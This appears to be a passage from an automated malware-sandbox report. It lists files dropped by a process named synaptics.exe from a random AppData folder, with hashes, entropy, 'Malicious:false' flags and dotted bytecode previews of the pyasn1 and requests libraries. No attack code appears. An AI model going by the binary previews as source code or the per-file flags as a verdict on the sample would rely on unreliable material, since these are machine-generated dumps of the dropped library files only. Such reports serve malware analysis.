                                                                                                                                                                                                            Preview:o.......p..g.........................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.e.j.Z.e.j.Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j.e...Z.d.S.)......N)...error)...char)...tag)...univ)...ObjectDescriptor..GeneralizedTime..UTCTimec....................@...s:...e.Z.d.Z.e.j.j.Z.e.j.j...e...e.j.e.j.d.....Z.e.j.....Z.d.S.).r.........N)...__name__..__module__..__qualname__r......GraphicString..__doc__..tagSet..tagImplicitlyr......Tag..tagClassUniversal..tagFormatSimple..getTypeId..typeId..r....r.....OC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\type\useful.pyr........s................r....c....................@...sL...e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.G.d.d...d.e.j...Z.e...Z.e.d.d.....Z.e.d.d.....Z.d.S.)...TimeMixIn.....Fc....................@...s2...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z.TimeMixIn.FixedOffsetz&Fixed offset in minutes east from UTC.r......UTCc....................C...s....t.j.|.d...|._.|.|._.d.S.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3915
                                                                                                                                                                                                            Entropy (8bit):5.7922299119497636
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:1qPoGNOeYVGivMhhFJQlIgSdAhoppVaxdses42WQXIBmPriV7:sP8MhqKgSehXdFQYBJh
                                                                                                                                                                                                            MD5:E3BD79C234F0E8B7142FAA427A23CBD4
                                                                                                                                                                                                            SHA1:047C8440706107151C75B7C0061E745E5A8928A9
                                                                                                                                                                                                            SHA-256:948B65F2D2B7CD1D387FB2EA13D709123FFDE86062E2AE98E117EEE1DCCE4823
                                                                                                                                                                                                            SHA-512:FF38CB46D3FED655FAF44449EA5DD592CFE61112A91E8DABCE7AE810F4AF8CF654ADC414B2BF56219B4745166A4C1156280D14FDC72BBCFD255FBED91B4FE410
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sL...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y#......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y7......d.Z.Y.n.w.d.d...Z.d.d...Z.z.e.e.j.e.e.....W.n...e.e.f.y`......e...d...e.j.e.e...e.....Y.n.w.z.z.d.d.l.Z.W.n...e.ys......d.Z.Y.n.w.e.e.d.d...s.d.d.l.m.Z...e.......d.d.l.m.Z...e.e.....W.n...e.y.......Y.n.w.d.d.l.m.Z...e...d.e.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m.Z...d.d.l)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1..d.d.l.m2Z2m3Z3m4Z4m5Z5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>m?Z?..d.d.l@mAZAmBZB..d.d.lCmDZD..e..EeF...Ge.......e.j.d.e4d.d.....d.S.).a.....Requests HTTP Library.~~~~~~~~~~~~~~~~~~~~~..Requests is an HTTP library, written in Python, for human beings..Basic GET usage:.. >>> import requests. >>> r = requests.get('https://www.python.org'). >>> r.status_code. 200. >>> b'Python is a programming language' in r.content. True..... or POST:.. >>> payload = dict(key1='value1', key2='value2
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):529
                                                                                                                                                                                                            Entropy (8bit):5.564980784435289
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CBUexOsG8ReRyu7msvBXV5b4SazcAFAu63WcgfsZRm7hooookk:OxdOyqmsvBF5McAFAu6pgfa4ek
                                                                                                                                                                                                            MD5:7756C497C6698854C43BD2DC92934FAB
                                                                                                                                                                                                            SHA1:592E1DC20D041C742C769F49157FE533920CCFA3
                                                                                                                                                                                                            SHA-256:D589D4BB639C952B3268689FCAEBD32D5CF13A1F9AE9CC8447CBC0014E60BC9B
                                                                                                                                                                                                            SHA-512:EB5D14F2EE8E63BF75EDDC3E728B38F9A3992FAF940768363E09EBDAF6477B83F5D024C65370AEE5CB840855AAC9749CB3D6D0DE6CDCFBBDE6FFB5FEDADCBEE2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s,...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.)...requestsz.Python HTTP for Humans.z.https://requests.readthedocs.ioz.2.32.3i.2..z.Kenneth Reitzz.me@kennethreitz.orgz.Apache-2.0z.Copyright Kenneth Reitzu..... .. .N)...__title__..__description__..__url__..__version__..__build__..__author__..__author_email__..__license__..__copyright__..__cake__..r....r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\requests\__version__.py..<module>....s........................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1605
                                                                                                                                                                                                            Entropy (8bit):5.659880454467634
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:NUBWAmpGWydoNxLbircr1OlX4Ja8me5Q+:N0j95+nbtpYqa8me5Q+
                                                                                                                                                                                                            MD5:A6C07B2B4AB0E760315F5D53180F7E32
                                                                                                                                                                                                            SHA1:2D795865861DFFD04301B96BF418960DE3D51C3D
                                                                                                                                                                                                            SHA-256:D28BC72933CAE9EE76E274BE20DD399654E96512FA0D3DB8A67F9FB6E90495B9
                                                                                                                                                                                                            SHA-512:65411ED86173268867A20DDCF068EBDBC1B889B136526A1F962674BEB08C6C5696B32BEDA4E501A2BDF81254C3080B23D6332C0B309A49252DB0460E89235668
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sr...d.Z.d.d.l.Z.d.d.l.m.Z...e...d...Z.e...d...Z.e...d...Z.e...d...Z.e.e.f.Z.e.e.f.Z.e.e.e.e.i.Z.d.d.d...Z.d.d...Z.d.S.).z..requests._internal_utils.~~~~~~~~~~~~~~..Provides utility functions that are consumed internally by Requests.which depend on extremely few external helpers (such as compat)......N.....)...builtin_strs....^[^:\s][^:\r\n]*$z.^[^:\s][^:\r\n]*$s....^\S[^\r\n]*$|^$z.^\S[^\r\n]*$|^$..asciic....................C...s ...t.|.t...r.|.}.|.S.|...|...}.|.S.).z.Given a string object, regardless of type, returns a representation of. that string in the native string type, encoding and decoding where. necessary. This assumes ASCII unless told otherwise.. )...isinstancer......decode)...string..encoding..out..r.....UC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\requests\_internal_utils.py..to_native_string....s..............r....c....................C...s4...t.|.t...s.J...z.|...d.....W.d.S...t.y.......Y.d.S.w.).z.Determin
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):22019
                                                                                                                                                                                                            Entropy (8bit):5.43172862951124
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:RmMUzG/lVfA1fIGIZ4Wj6EE28aauabYqpXMNpeux9URUlegWjvPWVhynNJRIVv8l:00TQfIGw4qpmcUp5luxifgCWSYvH9yck
                                                                                                                                                                                                            MD5:6BC9E5F061C7D88C28BD0FDAB822CA5B
                                                                                                                                                                                                            SHA1:768AEDB4354EEAF6920B215E5F08944BD8C83CE5
                                                                                                                                                                                                            SHA-256:F34D5C9E55EA8EB703EA4ECDCC93D73E74176C769ABD275286E1CD886706941F
                                                                                                                                                                                                            SHA-512:B6C18F37A582DBF485518C904E5BFB092B57E355E57354F947465AEF723900AE3BA445BDB25569342244749237195E2CC8218C8FCBEE12E722D167329581F4C8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g;k.......................@...s&...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m.Z.m,Z,m-Z-m.Z.m.Z.m/Z/m0Z0m.Z...d.d.l1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;m<Z<..z.d.d.l=m>Z>..W.n...e?y.......d.d...Z>Y.n.w.e.j@r.d.d.l1mAZA..d.ZBd.ZCd.ZDd.ZEz.d.d.lFZFe!..ZGeG.He7e6......W.n...e?y.......d.ZGY.n.w........ .!.".#.$.%.&d-d'd(..ZIG.d)d*..d*..ZJG.d+d,..d,eJ..ZKd.S.).z..requests.adapters.~~~~~~~~~~~~~~~~~..This module contains the transport adapters that Requests uses to define.and maintain connections.......N)...ClosedPoolError..ConnectTimeoutError)...HTTPError)...InvalidHeader)...LocationValueError..MaxRetryError..NewConnectionError..ProtocolError)...ProxyError)...ReadTimeoutError..ResponseError)...SSLError)...PoolManager..proxy_from_url)...Timeout)...parse_ur
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):22019
                                                                                                                                                                                                            Entropy (8bit):5.43172862951124
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:RmMUzG/lVfA1fIGIZ4Wj6EE28aauabYqpXMNpeux9URUlegWjvPWVhynNJRIVv8l:00TQfIGw4qpmcUp5luxifgCWSYvH9yck
                                                                                                                                                                                                            MD5:6BC9E5F061C7D88C28BD0FDAB822CA5B
                                                                                                                                                                                                            SHA1:768AEDB4354EEAF6920B215E5F08944BD8C83CE5
                                                                                                                                                                                                            SHA-256:F34D5C9E55EA8EB703EA4ECDCC93D73E74176C769ABD275286E1CD886706941F
                                                                                                                                                                                                            SHA-512:B6C18F37A582DBF485518C904E5BFB092B57E355E57354F947465AEF723900AE3BA445BDB25569342244749237195E2CC8218C8FCBEE12E722D167329581F4C8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g;k.......................@...s&...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m.Z.m,Z,m-Z-m.Z.m.Z.m/Z/m0Z0m.Z...d.d.l1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;m<Z<..z.d.d.l=m>Z>..W.n...e?y.......d.d...Z>Y.n.w.e.j@r.d.d.l1mAZA..d.ZBd.ZCd.ZDd.ZEz.d.d.lFZFe!..ZGeG.He7e6......W.n...e?y.......d.ZGY.n.w........ .!.".#.$.%.&d-d'd(..ZIG.d)d*..d*..ZJG.d+d,..d,eJ..ZKd.S.).z..requests.adapters.~~~~~~~~~~~~~~~~~..This module contains the transport adapters that Requests uses to define.and maintain connections.......N)...ClosedPoolError..ConnectTimeoutError)...HTTPError)...InvalidHeader)...LocationValueError..MaxRetryError..NewConnectionError..ProtocolError)...ProxyError)...ReadTimeoutError..ResponseError)...SSLError)...PoolManager..proxy_from_url)...Timeout)...parse_ur
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6705
                                                                                                                                                                                                            Entropy (8bit):5.146262477030171
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:t4kMfrO7AyGLluXW87ZolNAzj8t8vYat9DMGm6RGmOsGmfiC:rMDY7EeZjM8WeRys2C
                                                                                                                                                                                                            MD5:EB19B3892CAF72AF48C850BD8AEA7D10
                                                                                                                                                                                                            SHA1:A029B66EEF17E11C6885E14B61E351165FB698A5
                                                                                                                                                                                                            SHA-256:7807C23420A26734A8127DF5D0E0086B28B2EF044A43A6812FABEE60C76D023B
                                                                                                                                                                                                            SHA-512:AC6348C5315BF73CF6DB8EC547AED1C740C47E119F1FE47246F3720F5A5E39977218137C378ABF125B45F522F2B4537DE5A25FC40C8824A661EA1814700772AF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g1........................@...s\...d.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z..requests.api.~~~~~~~~~~~~..This module implements the Requests API...:copyright: (c) 2012 by Kenneth Reitz..:license: Apache2, see LICENSE for more details.......)...sessionsc....................K...sB...t.......}.|.j.d.|.|.d...|.....W...d.........S.1.s.w.......Y...d.S.).a....Constructs and sends a :class:`Request <Request>`... :param method: method for the new :class:`Request` object: ``GET``, ``OPTIONS``, ``HEAD``, ``POST``, ``PUT``, ``PATCH``, or ``DELETE``.. :param url: URL for the new :class:`Request` object.. :param params: (optional) Dictionary, list of tuples or bytes to send. in the query string for the :class:`Request`.. :param data: (optional) Dictionary, list of tuples, bytes, or file-like. object to send in the body of the :class:`Request`.. :param json: (optional) A JSON serializable Python object to se
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8101
                                                                                                                                                                                                            Entropy (8bit):5.490199182203775
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:4B0/m1AjzLPVCFA1PCGLcBCJI1W22VjwTrhhbVYy:w0/m1iVCOPCGLRWW22aTNhl
                                                                                                                                                                                                            MD5:67E5394C1A019C94C510EEF5D7CE9452
                                                                                                                                                                                                            SHA1:9D8D7C82CB171EAA0D37A6BC0532911DF7CE4CD2
                                                                                                                                                                                                            SHA-256:A987079B2EA9F767488FA3DE626057E39BCF4E748268885F7188864340AE782B
                                                                                                                                                                                                            SHA-512:432CDC580586382B9F23FE4EAD677EA19A755135CFA6E417B89E494CD3AE865042BBF4494915ADFD706B119D56D3332ACF3F8D2C0A06D1D32D382E30AD515E64
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.'.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z].requests.auth.~~~~~~~~~~~~~..This module contains the authentication handlers for Requests.......N)...b64encode.....)...to_native_string)...basestring..str..urlparse)...extract_cookies_to_jar)...parse_dict_headerz!application/x-www-form-urlencodedz.multipart/form-datac....................C...s....t.|.t...s.t.j.d...|...t.d.....t.|...}.t.|.t...s(t.j.d...t.|.....t.d.....t.|...}.t.|.t...r2|...d...}.t.|.t...r<|...d...}.d.t.t.d...|.|.f.............}.|.S.).z.Returns a Basic Auth string.z.Non-string usernames will no longer be supported in Requests 3.0.0. Please convert the object you've passed in ({!r}) to a string or bytes object in the near future to avoid problems.)...categoryz.Non-string passwords will no longer be supported in Requests 3.0
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):606
                                                                                                                                                                                                            Entropy (8bit):5.313634149400393
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CYOBe1A3Dj4uIy1XfB4A4kvYa4Zk3S2sUCc01v8pfsZRUcENM:LgbXKAhwa93DRCUfaZ
                                                                                                                                                                                                            MD5:1A82A8D622E3917CCC994A0A52D9275F
                                                                                                                                                                                                            SHA1:775D4ED1BB17414AC1D7CE2A2A55F5C4390918EB
                                                                                                                                                                                                            SHA-256:67BCAA8EC5EB28295CA2FD367358DCD7C0EC3345800064E298E47B53CC8C73CD
                                                                                                                                                                                                            SHA-512:62747153294BA2A23315E1813566EC5078647DD42EAE5EC78B17342D20AC0B34DE451AFA4079771EF1E2D9CBD4EA0726F1877577AAA6BF9D0EA200E673144FEC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s*...d.Z.d.d.l.m.Z...e.d.k.r.e.e.......d.S.d.S.).uF....requests.certs.~~~~~~~~~~~~~~..This module returns the preferred default CA certificate bundle. There is.only one . the one from the certifi package...If you are packaging Requests, e.g., for a Linux distribution or a managed.environment, you can change the definition of where() to return a separately.packaged CA bundle.......)...where..__main__N)...__doc__Z.certifir......__name__..print..r....r.....KC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\requests\certs.py..<module>....s..............
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1757
                                                                                                                                                                                                            Entropy (8bit):5.606899048783056
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:6AUIkbGXHyOLyRJV79pWlKPV+5MTYGi4k0b8+:6R8XyUyRJJ9wKPV+5f4kI
                                                                                                                                                                                                            MD5:5D2CFAFBC5F5542CB544F36AB629C083
                                                                                                                                                                                                            SHA1:CDE8998A5D9AAD8C305495413DD652E5DB4F370F
                                                                                                                                                                                                            SHA-256:03A9192B112C6A8C143AA2EE084473DB1CF1A5D0E41D413F89D01178B3A355F3
                                                                                                                                                                                                            SHA-512:27BCAC53562649D1734A78DA6611EED0D1D690925FBB066961F165C9E42913DBA4410C399E22B4FCF62CBEBDC9EDA3703EAEFD7664E3BA989430BDE6A898A879
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sD...d.Z.d.d.l.Z.d.d.l.Z.d.d...Z.e...Z.e.j.Z.e.d...d.k.Z.e.d...d.k.Z.d.Z.z.d.d.l.Z.d.Z.W.n...e.y7......d.d.l.Z.Y.n.w.e.rAd.d.l.m.Z...n.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%..d.d.l&m'Z'm(Z(m)Z)m*Z*m+Z+..e,Z-e,Z,e.Z.e,e.f.Z/e0e1f.Z2e0f.Z3d.S.).z..requests.compat.~~~~~~~~~~~~~~~..This module previously handled import compatibility issues.between Python 2 and Python 3. It remains for backwards.compatibility until the next major version.......Nc....................C...s<...d.}.d.D.].}.|.d.u.r.z.t...|...}.W.q...t.y.......Y.q.w.q.|.S.).z-Find supported character detection libraries.N)...chardet..charset_normalizer)...importlib..import_module..ImportError).r......lib..r.....LC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\requests\compat.py.._resolve_char_detection....s........................r..............FT)...JSONDecodeError)...OrderedDict)...Callable.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18700
                                                                                                                                                                                                            Entropy (8bit):5.258954351347999
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mEvXhqn08OcOwp5PmoFKcA8YIL0RE9IFHQSAMGHQJCVGjxPA0lcQH:mEvXhqn08HbpZB0AVeiIVByHQs0php
                                                                                                                                                                                                            MD5:CBDD940A31874A9D6A9A051F1EDBA6E0
                                                                                                                                                                                                            SHA1:0F052DA4223211A8C7D32CCBFC0A498C09ECEFBE
                                                                                                                                                                                                            SHA-256:306DC613F41410FDFC8E48C9BE6DEBCE654FE63E5A50C9BA3466006E07D2E31E
                                                                                                                                                                                                            SHA-512:56E8D0923C37D6AF956CBAC05744374C4024E40EA517203B354E58CA1B876A54341EF40D1EA8EBF03245A2FF2A320FB854CD6F1E98BB5E42C32515FF8C3E25CB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.H.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...z.d.d.l.Z.W.n...e.y5......d.d.l.Z.Y.n.w.G.d.d...d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e.j.e...Z.d.d...Z.d.d...Z.d.d...Z.d d.d...Z.d.d...Z.d.S.)!z..requests.cookies.~~~~~~~~~~~~~~~~..Compatibility code to be able to use `http.cookiejar.CookieJar` with requests...requests.utils imports from here, so be careful with imports.......N.....)...to_native_string)...Morsel..MutableMapping..cookielib..urlparse..urlunparsec....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d.S.) ..MockRequesta....Wraps a `requests.Request` to mimic a `urllib2.Request`... The code in `http.cookiejar.CookieJar` expects this interface in order to correctly. manage cookie policies, i.e., determine whether a cookie can be set, given the. domains of th
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18700
                                                                                                                                                                                                            Entropy (8bit):5.258954351347999
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mEvXhqn08OcOwp5PmoFKcA8YIL0RE9IFHQSAMGHQJCVGjxPA0lcQH:mEvXhqn08HbpZB0AVeiIVByHQs0php
                                                                                                                                                                                                            MD5:CBDD940A31874A9D6A9A051F1EDBA6E0
                                                                                                                                                                                                            SHA1:0F052DA4223211A8C7D32CCBFC0A498C09ECEFBE
                                                                                                                                                                                                            SHA-256:306DC613F41410FDFC8E48C9BE6DEBCE654FE63E5A50C9BA3466006E07D2E31E
                                                                                                                                                                                                            SHA-512:56E8D0923C37D6AF956CBAC05744374C4024E40EA517203B354E58CA1B876A54341EF40D1EA8EBF03245A2FF2A320FB854CD6F1E98BB5E42C32515FF8C3E25CB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.H.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...z.d.d.l.Z.W.n...e.y5......d.d.l.Z.Y.n.w.G.d.d...d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e.j.e...Z.d.d...Z.d.d...Z.d.d...Z.d d.d...Z.d.d...Z.d.S.)!z..requests.cookies.~~~~~~~~~~~~~~~~..Compatibility code to be able to use `http.cookiejar.CookieJar` with requests...requests.utils imports from here, so be careful with imports.......N.....)...to_native_string)...Morsel..MutableMapping..cookielib..urlparse..urlunparsec....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d.S.) ..MockRequesta....Wraps a `requests.Request` to mimic a `urllib2.Request`... The code in `http.cookiejar.CookieJar` expects this interface in order to correctly. manage cookie policies, i.e., determine whether a cookie can be set, given the. domains of th
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6208
                                                                                                                                                                                                            Entropy (8bit):4.924006211048709
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:CrpcCB6P/5IldtEEJiCr6dNtQlrnlGkh98RZR1YgvOHwXx:CrpixIlv/JPr6OgH2Qh
                                                                                                                                                                                                            MD5:036562B0BE135FCAC201EE69D75B0C82
                                                                                                                                                                                                            SHA1:D647884AAA8F8B1E2297BD3E132A3D12B9FF08DE
                                                                                                                                                                                                            SHA-256:EDE13B11C0F6F38E19E2094243212448DFE7AA5AB012343C0F14CECAA98CB6FF
                                                                                                                                                                                                            SHA-512:F5BA6A646D4C5576107BCA3C86CF4395ABBF3FFABF6C7762A46E48DE9CECF24A4BBA21A5FEDB12DDFD591E8C37790A416A5FD02B747F29B1F9B8912C56F0D75E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d ..d e.e...Z.G.d!d"..d"e.e...Z.G.d#d$..d$e.e...Z.G.d%d&..d&e...Z.G.d'd(..d(e...Z.G.d)d*..d*e.e...Z.G.d+d,..d,e.e...Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.G.d1d2..d2e...Z.G.d3d4..d4e.e ..Z!G.d5d6..d6e...Z"d7S.)8z`.requests.exceptions.~~~~~~~~~~~~~~~~~~~..This module contains the set of Requests' exceptions.......)...HTTPError.....)...JSONDecodeErrorc........................s ...e.Z.d.Z.d.Z...f.d.d...Z.....Z.S.)...RequestExceptionzTThere was an ambiguous exception that occurred while handling your. request.. c........................sX...|...d.d...}.|.|._.|...d.d...|._.|.d.u.r!|.j.s!t.|.d...r!|.j.j.|._.t...j.|.i.|.......d.S.).zBInitialize RequestException with `request` and `response` objects...resp
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6208
                                                                                                                                                                                                            Entropy (8bit):4.924006211048709
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:CrpcCB6P/5IldtEEJiCr6dNtQlrnlGkh98RZR1YgvOHwXx:CrpixIlv/JPr6OgH2Qh
                                                                                                                                                                                                            MD5:036562B0BE135FCAC201EE69D75B0C82
                                                                                                                                                                                                            SHA1:D647884AAA8F8B1E2297BD3E132A3D12B9FF08DE
                                                                                                                                                                                                            SHA-256:EDE13B11C0F6F38E19E2094243212448DFE7AA5AB012343C0F14CECAA98CB6FF
                                                                                                                                                                                                            SHA-512:F5BA6A646D4C5576107BCA3C86CF4395ABBF3FFABF6C7762A46E48DE9CECF24A4BBA21A5FEDB12DDFD591E8C37790A416A5FD02B747F29B1F9B8912C56F0D75E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
